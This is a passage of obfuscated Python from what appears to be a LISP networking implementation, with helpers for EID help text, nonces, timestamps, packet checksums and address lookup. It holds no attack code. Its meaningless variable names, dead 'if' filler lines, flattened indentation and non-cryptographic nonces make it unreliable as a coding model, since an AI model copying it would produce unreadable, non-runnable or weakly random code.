if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
def lisp_eid_help_hover ( output ) :
iiIIii = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
if 70 - 70: o0oOOo0O0Ooo - OOooOOo
if 62 - 62: I11i
O000oOo = lisp_span ( output , iiIIii )
return ( O000oOo )
if 53 - 53: iIii1I11I1II1 + o0oOOo0O0Ooo - OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
def lisp_geo_help_hover ( output ) :
iiIIii = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
O000oOo = lisp_span ( output , iiIIii )
return ( O000oOo )
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
def space ( num ) :
Oo0Ooo0O0 = ""
for IiIIi1IiiIiI in range ( num ) : Oo0Ooo0O0 += " "
return ( Oo0Ooo0O0 )
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
def lisp_get_ephemeral_port ( ) :
return ( random . randrange ( 32768 , 65535 ) )
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
def lisp_get_data_nonce ( ) :
return ( random . randint ( 0 , 0xffffff ) )
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
def lisp_get_control_nonce ( ) :
return ( random . randint ( 0 , ( 2 ** 64 ) - 1 ) )
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
def lisp_hex_string ( integer_value ) :
i11II = hex ( integer_value ) [ 2 : : ]
if ( i11II [ - 1 ] == "L" ) : i11II = i11II [ 0 : - 1 ]
return ( i11II )
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
def lisp_get_timestamp ( ) :
return ( time . time ( ) )
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
if 65 - 65: II111iiii - I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 * iII111i + Ii1I
if 79 - 79: ooOoO0o . OoOoOO00 % I1Ii111 - Oo0Ooo
def lisp_set_timestamp ( seconds ) :
return ( time . time ( ) + seconds )
if 69 - 69: ooOoO0o - o0oOOo0O0Ooo . ooOoO0o
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
def lisp_print_elapsed ( ts ) :
if ( ts == 0 or ts == None ) : return ( "never" )
oO000o0Oo00 = time . time ( ) - ts
oO000o0Oo00 = round ( oO000o0Oo00 , 0 )
return ( str ( datetime . timedelta ( seconds = oO000o0Oo00 ) ) )
if 77 - 77: iIii1I11I1II1 + OoO0O00 . I1ii11iIi11i % OoO0O00
if 93 - 93: O0
if 85 - 85: i11iIiiIii % i11iIiiIii + O0 / OOooOOo
if 89 - 89: Ii1I % i1IIi % oO0o
if 53 - 53: oO0o * OoooooooOO . OoOoOO00
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
def lisp_print_future ( ts ) :
if ( ts == 0 ) : return ( "never" )
iiIiII11i1 = ts - time . time ( )
if ( iiIiII11i1 < 0 ) : return ( "expired" )
iiIiII11i1 = round ( iiIiII11i1 , 0 )
return ( str ( datetime . timedelta ( seconds = iiIiII11i1 ) ) )
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
if 46 - 46: IiII + oO0o
if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
if 100 - 100: II111iiii * I11i % I1IiiI / I1ii11iIi11i
if 90 - 90: I1ii11iIi11i . ooOoO0o . OoOoOO00 . Ii1I
if 4 - 4: Ii1I + OoOoOO00 % I1ii11iIi11i / i11iIiiIii
if 74 - 74: II111iiii . O0 - I1IiiI + IiII % i11iIiiIii % OoOoOO00
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
def lisp_print_eid_tuple ( eid , group ) :
I11i11i1 = eid . print_prefix ( )
if ( group . is_null ( ) ) : return ( I11i11i1 )
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
iI1i1iIi1iiII = group . print_prefix ( )
o0OoO0000o = group . instance_id
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if ( eid . is_null ( ) or eid . is_exact_match ( group ) ) :
ooo = iI1i1iIi1iiII . find ( "]" ) + 1
return ( "[{}](*, {})" . format ( o0OoO0000o , iI1i1iIi1iiII [ ooo : : ] ) )
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
II11I = eid . print_sg ( group )
return ( II11I )
if 31 - 31: Ii1I
if 18 - 18: ooOoO0o + Ii1I
if 5 - 5: OoooooooOO + I11i * II111iiii
if 98 - 98: OOooOOo % i1IIi . I1IiiI . II111iiii . I1ii11iIi11i / i11iIiiIii
if 32 - 32: o0oOOo0O0Ooo + I1IiiI . I1Ii111
if 41 - 41: OoOoOO00 . i11iIiiIii / I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
def lisp_convert_6to4 ( addr_str ) :
if ( addr_str . find ( "::ffff:" ) == - 1 ) : return ( addr_str )
IiiIIi1 = addr_str . split ( ":" )
return ( IiiIIi1 [ - 1 ] )
if 28 - 28: o0oOOo0O0Ooo
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
def lisp_convert_4to6 ( addr_str ) :
IiiIIi1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
if ( IiiIIi1 . is_ipv4_string ( addr_str ) ) : addr_str = "::ffff:" + addr_str
IiiIIi1 . store_address ( addr_str )
return ( IiiIIi1 )
if 32 - 32: OoooooooOO . OoO0O00 / Oo0Ooo * o0oOOo0O0Ooo / o0oOOo0O0Ooo * Ii1I
if 19 - 19: Ii1I
if 55 - 55: OOooOOo % OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
def lisp_gethostbyname ( string ) :
IIi1 = string . split ( "." )
OoO0oO = string . split ( ":" )
Ii = string . split ( "-" )
if 20 - 20: o0oOOo0O0Ooo * ooOoO0o
if ( len ( IIi1 ) > 1 ) :
if ( IIi1 [ 0 ] . isdigit ( ) ) : return ( string )
if 10 - 10: I11i - Oo0Ooo
if ( len ( OoO0oO ) > 1 ) :
try :
int ( OoO0oO [ 0 ] , 16 )
return ( string )
except :
pass
if 59 - 59: OoooooooOO * Oo0Ooo + i1IIi
if 23 - 23: ooOoO0o
if 13 - 13: iIii1I11I1II1
if 77 - 77: i11iIiiIii - iIii1I11I1II1 / oO0o / ooOoO0o / OoO0O00
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if ( len ( Ii ) == 3 ) :
for IiIIi1IiiIiI in range ( 3 ) :
try : int ( Ii [ IiIIi1IiiIiI ] , 16 )
except : break
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
try :
IiiIIi1 = socket . gethostbyname ( string )
return ( IiiIIi1 )
except :
if ( lisp_is_alpine ( ) == False ) : return ( "" )
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
try :
IiiIIi1 = socket . getaddrinfo ( string , 0 ) [ 0 ]
if ( IiiIIi1 [ 3 ] != string ) : return ( "" )
IiiIIi1 = IiiIIi1 [ 4 ] [ 0 ]
except :
IiiIIi1 = ""
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
return ( IiiIIi1 )
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
def lisp_ip_checksum ( data , hdrlen = 20 ) :
if ( len ( data ) < hdrlen ) :
lprint ( "IPv4 packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
Ooo0oO = binascii . hexlify ( data )
if 32 - 32: i1IIi . iII111i + II111iiii - OoO0O00 - iIii1I11I1II1
if 20 - 20: OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , hdrlen * 2 , 4 ) :
Oo0 += int ( Ooo0oO [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
Oo0 = struct . pack ( "H" , Oo0 )
Ooo0oO = data [ 0 : 10 ] + Oo0 + data [ 12 : : ]
return ( Ooo0oO )
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
def lisp_icmp_checksum ( data ) :
if ( len ( data ) < 36 ) :
lprint ( "ICMP packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
O00ooooo00 = binascii . hexlify ( data )
if 94 - 94: I11i - II111iiii . I1IiiI - Oo0Ooo + I1ii11iIi11i * I1ii11iIi11i
if 27 - 27: IiII * I1IiiI . iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , 36 , 4 ) :
Oo0 += int ( O00ooooo00 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
Oo0 = struct . pack ( "H" , Oo0 )
O00ooooo00 = data [ 0 : 2 ] + Oo0 + data [ 4 : : ]
return ( O00ooooo00 )
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
def lisp_udp_checksum ( source , dest , data ) :
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
IiII1iiI = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
OooOOOoOoo0O0 = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
O0OOOOo0 = socket . htonl ( len ( data ) )
OOooO0Oo00 = socket . htonl ( LISP_UDP_PROTOCOL )
iIIIIIIIiIII = IiII1iiI . pack_address ( )
iIIIIIIIiIII += OooOOOoOoo0O0 . pack_address ( )
iIIIIIIIiIII += struct . pack ( "II" , O0OOOOo0 , OOooO0Oo00 )
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
o0oOo00 = binascii . hexlify ( iIIIIIIIiIII + data )
IiI1III = len ( o0oOo00 ) % 4
for IiIIi1IiiIiI in range ( 0 , IiI1III ) : o0oOo00 += "0"
if 91 - 91: I11i + Ii1I - OoOoOO00 - OoO0O00 + IiII
if 33 - 33: OoO0O00 - Oo0Ooo / ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , len ( o0oOo00 ) , 4 ) :
Oo0 += int ( o0oOo00 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
Oo0 = struct . pack ( "H" , Oo0 )
o0oOo00 = data [ 0 : 6 ] + Oo0 + data [ 8 : : ]
return ( o0oOo00 )
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
def lisp_igmp_checksum ( igmp ) :
i11ii = binascii . hexlify ( igmp )
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , 24 , 4 ) :
Oo0 += int ( i11ii [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 45 - 45: OoooooooOO
if 9 - 9: I11i . OoO0O00 * i1IIi . OoooooooOO
if 32 - 32: OoOoOO00 . I1ii11iIi11i % I1IiiI - II111iiii
if 11 - 11: O0 + I1IiiI
if 80 - 80: oO0o % oO0o % O0 - i11iIiiIii . iII111i / O0
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 13 - 13: I1IiiI + O0 - I1ii11iIi11i % Oo0Ooo / Ii1I . i1IIi
if 60 - 60: Oo0Ooo . IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
Oo0 = struct . pack ( "H" , Oo0 )
igmp = igmp [ 0 : 2 ] + Oo0 + igmp [ 4 : : ]
return ( igmp )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
def lisp_get_interface_address ( device ) :
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
if 93 - 93: Oo0Ooo / I1ii11iIi11i + i1IIi * oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if ( device not in netifaces . interfaces ( ) ) : return ( None )
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
IIiiI = netifaces . ifaddresses ( device )
if ( IIiiI . has_key ( netifaces . AF_INET ) == False ) : return ( None )
if 36 - 36: iII111i
if 52 - 52: I1Ii111 % O0 . i1IIi . OoooooooOO
if 33 - 33: OOooOOo % II111iiii
if 71 - 71: Ii1I * I1Ii111 % II111iiii . Ii1I % OoO0O00 + I1ii11iIi11i
o0oOo0OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
for IiiIIi1 in IIiiI [ netifaces . AF_INET ] :
oo0o00OO = IiiIIi1 [ "addr" ]
o0oOo0OO . store_address ( oo0o00OO )
return ( o0oOo0OO )
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
return ( None )
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
def lisp_get_input_interface ( packet ) :
I1iI1I1ii1 = lisp_format_packet ( packet [ 0 : 12 ] ) . replace ( " " , "" )
iIIi1 = I1iI1I1ii1 [ 0 : 12 ]
o0Ooo0o0Oo = I1iI1I1ii1 [ 12 : : ]
if 55 - 55: iIii1I11I1II1 * iII111i
try : oo = lisp_mymacs . has_key ( o0Ooo0o0Oo )
except : oo = False
if 30 - 30: O0 + OOooOOo % Oo0Ooo . i1IIi
if ( lisp_mymacs . has_key ( iIIi1 ) ) : return ( lisp_mymacs [ iIIi1 ] , o0Ooo0o0Oo , iIIi1 , oo )
if ( oo ) : return ( lisp_mymacs [ o0Ooo0o0Oo ] , o0Ooo0o0Oo , iIIi1 , oo )
return ( [ "?" ] , o0Ooo0o0Oo , iIIi1 , oo )
if 4 - 4: OOooOOo / iII111i * I11i - Oo0Ooo * I1IiiI
if 6 - 6: Ii1I
if 77 - 77: i1IIi + OoO0O00 . I1IiiI * OOooOOo / IiII / Ii1I
if 84 - 84: OoO0O00 / iIii1I11I1II1
if 33 - 33: i1IIi / I1Ii111 - i1IIi . Oo0Ooo
